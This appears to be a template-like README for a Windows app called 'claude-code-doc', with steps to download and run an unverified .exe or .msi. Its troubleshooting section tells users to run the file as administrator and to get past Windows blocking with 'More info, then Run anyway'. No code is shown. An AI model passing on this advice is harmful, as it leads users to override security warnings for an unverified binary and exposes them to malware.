🚀 Getting Started
claude-code-doc is a Windows app for reading and working with Claude code docs in one place. Use it to open the app, view the content, and follow the steps without setting up tools or writing code.

If the page shows a release file, download it to your PC. If it gives you a folder or package, download the main Windows file from that page.
🪟 Windows Requirements
Use a Windows PC with:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- A mouse and keyboard
- An internet connection for the first download
For best results, close other apps before you start.
🛠️ Install and Run
1. Open the download page in your browser.
2. Find the latest file for Windows.
3. Download the file to your Downloads folder.
4. Open File Explorer and go to Downloads.
5. Double-click the file to start the app.
6. If Windows asks for permission, choose Yes or Run.
7. Wait for the app to open.
If the file is a .zip folder, right-click it and choose Extract All before you open the app file inside.

📂 Common File Types
You may see these file types when you download the app:
- .exe - a Windows app file
- .zip - a compressed folder
- .msi - a Windows setup file
If you see .exe or .msi, double-click it to install or run the app. If you see .zip, extract it first.
🔧 First-Time Setup
When you open claude-code-doc for the first time:
1. Let Windows finish any security check.
2. Wait for the app window to load.
3. Read the on-screen prompts.
4. Choose any default folder if the app asks for one.
5. Open a doc file or start from the main screen.
If the app asks where your docs are stored, pick a folder you can find again, such as Documents or Desktop.

Open a Doc
- Start the app
- Choose a file or folder
- Select the doc you want to read
Work Through a Guide
- Read the steps in order
- Keep the app open while you follow along
- Return to the same page if you need to check a step again
Find Your Place
- Use the app’s list or menu to jump between docs
- Keep project files in one folder
- Rename files with clear names so they are easy to spot
🔍 If the App Does Not Open
Try these steps:
- Right-click the file and choose Run as administrator
- Check that the file finished downloading
- Move the file to your Desktop and try again
- If Windows blocks it, choose More info, then Run anyway
- Download the file again if it seems broken
